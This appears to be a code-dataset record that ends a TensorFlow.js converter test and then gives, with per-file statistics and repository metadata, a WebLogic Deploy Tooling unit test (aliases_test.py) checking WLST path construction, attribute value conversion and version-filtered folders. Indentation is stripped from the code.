with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
self.assertIsNot(signature['inputs'], None)
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_frozen_model(self):
self.create_frozen_model()
print(glob.glob(
os.path.join(self._tmp_dir, FROZEN_MODEL_DIR, '*')))
tf_saved_model_conversion_v2.convert_tf_frozen_model(
os.path.join(self._tmp_dir, FROZEN_MODEL_DIR, 'model.frozen'),
'Softmax',
os.path.join(self._tmp_dir, FROZEN_MODEL_DIR))
tfjs_path = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR)
# Check model.json and weights manifest.
with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
model_json = json.load(f)
self.assertTrue(model_json['modelTopology'])
self.assertIsNot(model_json['modelTopology']['versions'], None)
signature = model_json['userDefinedMetadata']['signature']
self.assertIsNot(signature, None)
# frozen model signature has no input nodes.
self.assertIsNot(signature['outputs'], None)
weights_manifest = model_json['weightsManifest']
self.assertCountEqual(weights_manifest[0]['paths'],
['group1-shard1of1.bin'])
self.assertIn('weights', weights_manifest[0])
self.assertTrue(
glob.glob(
os.path.join(self._tmp_dir, FROZEN_MODEL_DIR, 'group*-*')))
if __name__ == '__main__':
tf.test.main()
| 39.04
| 80
| 0.675205
| 4,890
| 37,088
| 4.858487
| 0.074233
| 0.066925
| 0.040828
| 0.043606
| 0.840306
| 0.81682
| 0.792449
| 0.771361
| 0.757808
| 0.740845
| 0
| 0.011873
| 0.193809
| 37,088
| 949
| 81
| 39.081138
| 0.782709
| 0.07981
| 0
| 0.687583
| 0
| 0
| 0.102181
| 0
| 0
| 0
| 0
| 0.001054
| 0.24032
| 1
| 0.049399
| false
| 0
| 0.026702
| 0
| 0.081442
| 0.001335
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c42a372ff15c2502e4f709baf9d2031db52277d
| 65,653
|
py
|
Python
|
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
core/src/test/python/aliases_test.py
|
zeusbaba/weblogic-deploy-tooling
|
78d4ea18f5a45f8c890556d99d6d1acd68d69eda
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
"""
Copyright (c) 2017, 2020, Oracle Corporation and/or its affiliates.
Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
"""
from org.python.modules import jarray
import unittest
from java.lang import Boolean
from java.lang import String, Long
from java.util import Properties
from oracle.weblogic.deploy.aliases import AliasException
from oracle.weblogic.deploy.aliases import TypeUtils
from wlsdeploy.aliases.aliases import Aliases
from wlsdeploy.aliases.location_context import LocationContext
import wlsdeploy.aliases.model_constants as FOLDERS
from wlsdeploy.aliases.validation_codes import ValidationCodes
from wlsdeploy.aliases.wlst_modes import WlstModes
from wlsdeploy.exception import exception_helper
import wlsdeploy.logging.platform_logger as platform_logger
from wlsdeploy.util.cla_utils import CommandLineArgUtil
from wlsdeploy.util.model_context import ModelContext
class AliasesTestCase(unittest.TestCase):
"""
1) Unit tests must be a class that extends unittest.TestCase
2) Class methods with names starting with 'test' will be executed by the framework (all others skipped)
"""
wls_version = '12.2.1.3'
arg_map = {
CommandLineArgUtil.ORACLE_HOME_SWITCH: '/oracleHome',
CommandLineArgUtil.DOMAIN_HOME_SWITCH: ''
}
logger = platform_logger.PlatformLogger('wlsdeploy.unittest')
model_context = ModelContext("test", arg_map)
# create a set of aliases for use with WLST
aliases = Aliases(model_context=model_context, wlst_mode=WlstModes.OFFLINE, wls_version=wls_version)
online_aliases = Aliases(model_context=model_context, wlst_mode=WlstModes.ONLINE, wls_version=wls_version)
def testDomainLevelAttributeAccessibility(self):
location = LocationContext()
string_value = ['9002', 9002]
model_attribute_name = 'AdministrationPort'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
wlst_attribute_name = 'AdministrationPort'
wlst_attribute_value = string_value[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, None)
location.append_location(FOLDERS.JMX)
location.add_name_token("JMX", 'mydomain')
string_value = ['true', 'true']
model_attribute_name = 'EditMBeanServerEnabled'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
return
def testDatasourceRootPath(self):
expected = '/JDBCSystemResource/my-datasource'
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'my-datasource')
path = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(path, expected)
location = LocationContext()
kwargs = {token: 'my-datasource'}
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE, **kwargs)
path = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(path, expected)
return
def testDatasourceParamsPath(self):
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDataSourceParams/NO_NAME_0'
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
path = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(path, expected)
return
def testDatasourceDriverPropertiesPath(self):
location = get_jdbc_params_properties_location('my-datasource', self.aliases)
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/' \
'JDBCDriverParams/NO_NAME_0/Properties/NO_NAME_0/Property'
path1 = self.aliases.get_wlst_list_path(location)
self.assertEqual(path1, expected)
online_location = get_jdbc_params_properties_location('my-datasource', self.online_aliases)
expected = '/JDBCSystemResources/my-datasource/JDBCResource/my-datasource/' \
'JDBCDriverParams/my-datasource/Properties/my-datasource/Properties'
path2 = self.online_aliases.get_wlst_list_path(online_location)
self.assertEqual(path2, expected)
# Path to access a single property by name (user in this example)
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/' \
'JDBCDriverParams/NO_NAME_0/Properties/NO_NAME_0/Property/user'
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'user')
path1 = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(path1, expected)
expected = '/JDBCSystemResources/my-datasource/JDBCResource/my-datasource/' \
'JDBCDriverParams/my-datasource/Properties/my-datasource/Properties/user'
online_location.add_name_token(self.aliases.get_name_token(online_location), 'user')
path2 = self.online_aliases.get_wlst_attributes_path(online_location)
self.assertEqual(path2, expected)
return
def testDatasourceMbeanListPath(self):
expected = '/JDBCSystemResource'
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
path = self.aliases.get_wlst_list_path(location)
self.assertEqual(path, expected)
return
def testDatasourceSubfoldersPath(self):
expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
location = get_jdbc_resource_location('my-datasource', self.aliases)
path = self.aliases.get_wlst_subfolders_path(location)
self.assertEqual(path, expected)
return
def testMachineMbeanListPath(self):
expected = '/Machine'
location = LocationContext()
location.append_location(FOLDERS.MACHINE)
path = self.aliases.get_wlst_list_path(location)
self.assertEqual(path, expected)
return
def testDatasourceMbeanType(self):
expected = 'JDBCSystemResource'
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
mbean_type = self.aliases.get_wlst_mbean_type(location)
self.assertEqual(mbean_type, expected)
return
def testDatasourceSubfolderMbeanType(self):
expected = 'JDBCDriverParams'
location = get_jdbc_driver_params_location('my-datasource', self.aliases)
mbean_type = self.aliases.get_wlst_mbean_type(location)
self.assertEqual(mbean_type, expected)
return
def testDatasourceSubFolderMbeanName(self):
expected = 'NO_NAME_0'
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
mbean_name = self.aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, expected)
return
def testGetModelSubFolders(self):
expected = ['JDBCOracleParams', 'JDBCConnectionPoolParams', 'JDBCXAParams',
'JDBCDataSourceParams', 'JDBCDriverParams']
location = get_jdbc_resource_location('my-datasource', self.aliases)
names = self.aliases.get_model_subfolder_names(location)
self.assertEqual(len(names), len(expected))
for name in names:
self.assertEqual(name in expected, True)
return
def testAppDeploymentPathTokenReplacement(self):
expected = self.model_context.replace_token_string('@@PWD@@/target/applications/simpleear.ear')
location = LocationContext()
location.append_location(FOLDERS.APPLICATION)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'simpleear')
model_attribute_name = 'SourcePath'
model_attribute_value = '@@PWD@@/target/applications/simpleear.ear'
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, expected)
expected = self.model_context.replace_token_string('@@WL_HOME@@/common/deployable-libraries/jsf-2.0.war')
location = LocationContext()
location.append_location(FOLDERS.LIBRARY)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'jsf#2.0@1.0.0.0_2-0-2')
model_attribute_name = 'SourcePath'
model_attribute_value = '@@WL_HOME@@/common/deployable-libraries/jsf-2.0.war'
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, expected)
return
def testReadOnlyAttributeAccess(self):
location = LocationContext()
location.append_location(FOLDERS.APPLICATION)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'simpleear')
model_attribute_name = 'AbsoluteSourcePath'
model_attribute_value = '@@PWD@@/target/applications/simpleear.ear'
wlst_attribute_name, wlst_attribute_value = \
self.online_aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_name, None)
self.assertEqual(wlst_attribute_value, None)
return
def testWlstAttributeValueConversion(self):
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
string_value = ['Hello', 'Hello']
model_attribute_name = 'AlgorithmType'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
string_value = ['123', 123]
model_attribute_name = 'RowPrefetchSize'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
string_value = ['3600', Long(3600)]
jms_location = LocationContext()
jms_location.append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
jms_location.add_name_token(self.aliases.get_name_token(jms_location), 'my-module')
jms_location.append_location(FOLDERS.JMS_RESOURCE)
add_default_token_value(jms_location, self.aliases)
jms_location.append_location(FOLDERS.CONNECTION_FACTORY)
jms_location.add_name_token(self.aliases.get_name_token(jms_location), 'my-connectionfactory')
jms_location.append_location(FOLDERS.DEFAULT_DELIVERY_PARAMS)
add_default_token_value(jms_location, self.aliases)
model_attribute_name = 'DefaultTimeToLive'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(jms_location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
self.assertEqual(wlst_attribute_value.getClass().getName(), 'java.lang.Long')
string_value = [1, 'true']
model_attribute_name = 'RowPrefetch'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
return
def testWlstAttributeListValueConversion(self):
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
model_attribute_name = 'JNDIName'
model_attribute_value = 'com.bea.datasource1, com.bea.datasource2'
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
offlineList = ['com.bea.datasource1', 'com.bea.datasource2']
self.assertEqual(wlst_attribute_value, offlineList)
onlineList = jarray.zeros(2, String)
onlineList[0] = 'com.bea.datasource1'
onlineList[1] = 'com.bea.datasource2'
wlst_attribute_name, wlst_attribute_value = \
self.online_aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, onlineList)
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, onlineList)
self.assertEqual(wlst_attribute_value, offlineList)
return
def testModelAttributeValueConversion(self):
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'my-datasource')
location.append_location(FOLDERS.JDBC_RESOURCE)
location.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
string_value = ['Hello', 'Hello']
wlst_attribute_name = 'AlgorithmType'
wlst_attribute_value = string_value[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, string_value[1])
string_value = ['123', 123]
wlst_attribute_name = 'RowPrefetchSize'
wlst_attribute_value = string_value[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, string_value[1])
string_value = [1, 'true']
wlst_attribute_name = 'RowPrefetch'
wlst_attribute_value = string_value[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, string_value[1])
return
def testConvertToTypeJarray(self):
location = LocationContext()
location.append_location(FOLDERS.SERVER)
token_name = self.aliases.get_name_token(location)
location.add_name_token(token_name, 'AdminServer')
location.append_location('FederationServices')
wlst_name = 'AssertionConsumerUri'
wlst_value = jarray.zeros(2, String)
wlst_value[0] = 'abc'
wlst_value[1] = 'def'
model_name, model_value = self.aliases.get_model_attribute_name_and_value(location, wlst_name, wlst_value)
self.assertEqual(model_name, wlst_name)
self.assertEqual(type(model_value), list)
self.assertEqual(model_value, ['abc', 'def'])
return
def testGetWlstAttributeNameAndValue(self):
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
# get wlst attribute value should return the value even if its the default
string_value = ['0', 0]
model_attribute_name = 'RowPrefetchSize'
model_attribute_value = string_value[0]
wlst_attribute_name, wlst_attribute_value = \
self.aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, model_attribute_value)
self.assertEqual(wlst_attribute_value, string_value[1])
return
def testGetModelAttributeNameAndValue(self):
location = get_jdbc_ds_params_location('my-datasource', self.aliases)
# get model attribute value should return the value only if its NOT the default
boolean_values = ['false', None]
wlst_attribute_name = 'RowPrefetch'
wlst_attribute_value = boolean_values[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, boolean_values[1])
# get model attribute value should return the value only if its NOT the default
string_value = [None, None]
wlst_attribute_name = 'RowPrefetchSize'
wlst_attribute_value = string_value[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, string_value[1])
# get model attribute value should return the value only if its NOT the default
location = LocationContext()
location.append_location(FOLDERS.SERVER)
boolean_values = [0, None]
wlst_attribute_name = 'NetworkClassLoadingEnabled'
wlst_attribute_value = boolean_values[0]
model_attribute_name, model_attribute_value = \
self.aliases.get_model_attribute_name_and_value(location, wlst_attribute_name, wlst_attribute_value)
self.assertEqual(model_attribute_value, boolean_values[1])
return
def testGetWlstAttributeName(self):
location = LocationContext()
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'my-datasource')
location.append_location(FOLDERS.JDBC_RESOURCE)
location.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
model_attribute_name = 'RowPrefetch'
wlst_attribute_name = self.aliases.get_wlst_attribute_name(location, model_attribute_name)
self.assertEqual(wlst_attribute_name, 'RowPrefetch')
return
def testGetWlstAttributeName2(self):
location=LocationContext().append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'TheModule')
location.append_location(FOLDERS.JMS_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.DISTRIBUTED_TOPIC)
location.add_name_token(self.aliases.get_name_token(location), 'TheTopic')
model_attribute_name = 'SafExportPolicy'
result = self.aliases.get_wlst_attribute_name(location, model_attribute_name)
self.assertEqual(result, 'SafExportPolicy')
result = self.online_aliases.get_wlst_attribute_name(location, model_attribute_name)
self.assertEqual(result, 'SAFExportPolicy')
return
def testIsWlstModelAttributeName(self):
wls_version = '10.3.6'
online_aliases = Aliases(self.model_context, WlstModes.ONLINE, wls_version)
location = get_jdbc_driver_params_location('my-datasource', self.aliases)
model_attribute_name = 'QosDegradationAllowed'
path = self.aliases.get_model_folder_path(location)
expected = exception_helper.get_message('WLSDPLY-08408', model_attribute_name, path, wls_version)
result, message = online_aliases.is_valid_model_attribute_name(location, model_attribute_name)
self.assertEqual(result, ValidationCodes.INVALID)
self.assertEqual(message, expected)
offline_aliases = Aliases(self.model_context, WlstModes.OFFLINE, wls_version)
location.pop_location()
location.append_location(FOLDERS.JDBC_ORACLE_PARAMS)
add_default_token_value(location, self.aliases)
model_attribute_name = 'OnsWalletPasswordEncrypted'
path = self.aliases.get_model_folder_path(location)
expected = exception_helper.get_message('WLSDPLY-08407', model_attribute_name, path, wls_version)
result, message = offline_aliases.is_valid_model_attribute_name(location, model_attribute_name)
self.assertEqual(result, ValidationCodes.VALID)
self.assertEqual(message, expected)
location.pop_location()
location.append_location(FOLDERS.JDBC_CONNECTION_POOL_PARAMS)
add_default_token_value(location, self.aliases)
model_attribute_name = 'CountOfTestFailuresTillFlush'
earliest_version = '12.1.2'
path = self.aliases.get_model_folder_path(location)
expected = exception_helper.get_message('WLSDPLY-08207', model_attribute_name, path,
wls_version, earliest_version)
result, message = online_aliases.is_valid_model_attribute_name(location, model_attribute_name)
self.assertEqual(result, ValidationCodes.VERSION_INVALID)
self.assertEqual(message, expected)
return
def testPropertyTypes(self):
expected = Properties()
expected.put('key1', 'val1')
expected.put('key2', 'val2')
expected.put('key3', 'val3')
test_string = 'key1=val1, key2=val2, key3=val3'
result = TypeUtils.convertToType('properties', test_string)
self.assertEqual(expected, result)
test_dict = {"key1": "val1", "key2": "val2", "key3": "val3"}
result = TypeUtils.convertToType('properties', test_dict)
self._assertMapEqual(expected, result)
def testNewGetWlstPaths(self):
attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
folder_expected = attr_expected
list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
location = get_jdbc_driver_params_location('my-datasource', self.aliases)
result = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = self.aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = self.aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = self.aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
'/NO_NAME_0/Properties/NO_NAME_0/Property/user'
folder_expected = attr_expected
list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
'/NO_NAME_0/Properties/NO_NAME_0/Property'
create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams' \
'/NO_NAME_0/Properties/NO_NAME_0'
add_jdbc_params_properties(location, self.aliases)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'user')
result = self.aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = self.aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = self.aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = self.aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
return
def testVersionFilteredFolders(self):
old_wls_version = '10.3.6'
new_wls_version = '12.2.1.3'
old_aliases = Aliases(self.model_context, WlstModes.OFFLINE, old_wls_version)
new_aliases = Aliases(self.model_context, WlstModes.OFFLINE, new_wls_version)
location = LocationContext()
location.append_location(FOLDERS.PARTITION)
mbean_type = old_aliases.get_wlst_mbean_type(location)
self.assertEqual(mbean_type, None, 'expected Partition type to be null')
mbean_type = new_aliases.get_wlst_mbean_type(location)
self.assertNotEqual(mbean_type, None, 'expected Partition type not to be null')
location.pop_location()
location.append_location(FOLDERS.CLUSTER)
location.append_location(FOLDERS.DYNAMIC_SERVERS)
mbean_type = old_aliases.get_wlst_mbean_type(location)
self.assertEqual(mbean_type, None, 'expected DynamicServers type to be null')
mbean_type = new_aliases.get_wlst_mbean_type(location)
self.assertNotEqual(mbean_type, None, 'expected DynamicServers type not to be null')
return
def testVersionFilteredFoldersWithFolderParams(self):
old_wls_version = '10.3.6'
new_wls_version = '12.2.1.3'
old_aliases = Aliases(self.model_context, WlstModes.OFFLINE, old_wls_version)
new_aliases = Aliases(self.model_context, WlstModes.OFFLINE, new_wls_version)
location = LocationContext()
location.append_location(FOLDERS.SAF_AGENT)
name_token = old_aliases.get_name_token(location)
location.add_name_token(name_token, 'SafAgent')
location.append_location(FOLDERS.SAF_MESSAGE_LOG_FILE)
mbean_type = old_aliases.get_wlst_mbean_type(location)
self.assertEqual(mbean_type, None, 'expected SAF Agent Message Log type to be null')
mbean_type = new_aliases.get_wlst_mbean_type(location)
self.assertNotEqual(mbean_type, None, 'expected SAF Agent Message Log not to be null')
return
def testDomainAttributeMethods(self):
aliases = Aliases(self.model_context, WlstModes.OFFLINE)
location = LocationContext()
get_required_attributes = aliases.get_wlst_get_required_attribute_names(location)
self.assertNotEqual(get_required_attributes, None, 'expected get-required attributes to not be None')
restart_required_attributes = aliases.get_wlst_get_required_attribute_names(location)
self.assertNotEqual(restart_required_attributes, None, 'expected restart-required attributes to not be None')
return
def testMTAliasLoading(self):
aliases = Aliases(self.model_context, WlstModes.OFFLINE)
attr_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
folder_expected = attr_expected
list_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
create_expected = '/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
location = get_jdbc_driver_params_location('my-datasource', self.aliases)
result = aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
attr_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
'/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
folder_expected = attr_expected
list_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
'/JdbcResource/my-datasource/JDBCDriverParams'
create_expected = '/ResourceGroupTemplate/MyResourceGroupTemplate/JDBCSystemResource/my-datasource' \
'/JdbcResource/my-datasource'
location = LocationContext()
location.append_location(FOLDERS.RESOURCE_GROUP_TEMPLATE)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'MyResourceGroupTemplate')
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
location.append_location(FOLDERS.JDBC_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
add_default_token_value(location, self.aliases)
result = aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
attr_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource' \
'/my-datasource/JDBCDriverParams/NO_NAME_0'
folder_expected = attr_expected
list_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource' \
'/my-datasource/JDBCDriverParams'
create_expected = '/ResourceGroup/MyResourceGroup/JDBCSystemResource/my-datasource/JdbcResource/my-datasource'
location = LocationContext()
location.append_location(FOLDERS.RESOURCE_GROUP)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'MyResourceGroup')
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
location.append_location(FOLDERS.JDBC_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
add_default_token_value(location, self.aliases)
result = aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
attr_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
'/my-datasource/JdbcResource/my-datasource/JDBCDriverParams/NO_NAME_0'
folder_expected = attr_expected
list_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
'/my-datasource/JdbcResource/my-datasource/JDBCDriverParams'
create_expected = '/Partition/MyPartition/ResourceGroup/MyResourceGroup/JDBCSystemResource' \
'/my-datasource/JdbcResource/my-datasource'
location = LocationContext()
location.append_location(FOLDERS.PARTITION)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'MyPartition')
location.append_location(FOLDERS.RESOURCE_GROUP)
token = self.aliases.get_name_token(location)
if token:
location.add_name_token(token, 'MyResourceGroup')
location.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'my-datasource')
location.append_location(FOLDERS.JDBC_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
add_default_token_value(location, self.aliases)
result = aliases.get_wlst_attributes_path(location)
self.assertEqual(result, attr_expected)
result = aliases.get_wlst_subfolders_path(location)
self.assertEqual(result, folder_expected)
result = aliases.get_wlst_list_path(location)
self.assertEqual(result, list_expected)
result = aliases.get_wlst_create_path(location)
self.assertEqual(result, create_expected)
return
def testChildNodeTypes(self):
location = LocationContext()
location.append_location(FOLDERS.SELF_TUNING)
result = self.aliases.requires_unpredictable_single_name_handling(location)
self.assertEqual(result, True)
result = self.aliases.supports_multiple_mbean_instances(location)
self.assertEqual(result, False)
name_token = self.aliases.get_name_token(location)
self.assertEqual(name_token, 'SELFTUNING')
location.add_name_token("DOMAIN", 'mydomain')
mbean_name = self.aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'NO_NAME_0')
mbean_name = self.online_aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'mydomain')
location.append_location(FOLDERS.WORK_MANAGER)
result = self.aliases.requires_unpredictable_single_name_handling(location)
self.assertEqual(result, False)
result = self.aliases.supports_multiple_mbean_instances(location)
self.assertEqual(result, True)
name_token = self.aliases.get_name_token(location)
self.assertEqual(name_token, 'WORKMANAGER')
location.add_name_token(name_token, 'MyWorkManager')
mbean_name = self.aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'MyWorkManager')
mbean_name = self.online_aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'MyWorkManager')
location.append_location('WorkManagerShutdownTrigger')
location.add_name_token(self.aliases.get_name_token(location), 'MyWorkManager')
result = self.aliases.supports_multiple_mbean_instances(location)
self.assertEqual(result, False)
name_token = self.aliases.get_name_token(location)
self.assertEqual(name_token, 'WORKMANAGERSHUTDOWNTRIGGER')
mbean_name = self.aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'NO_NAME_0')
mbean_name = self.online_aliases.get_wlst_mbean_name(location)
self.assertEqual(mbean_name, 'MyWorkManager')
location = LocationContext().append_location(FOLDERS.SECURITY, FOLDERS.GROUP, DOMAIN='mydomain')
result = self.aliases.supports_multiple_mbean_instances(location)
self.assertEqual(result, True)
return
def testFlattenedFolders(self):
location = get_jdbc_params_properties_location('my-datasource', self.aliases)
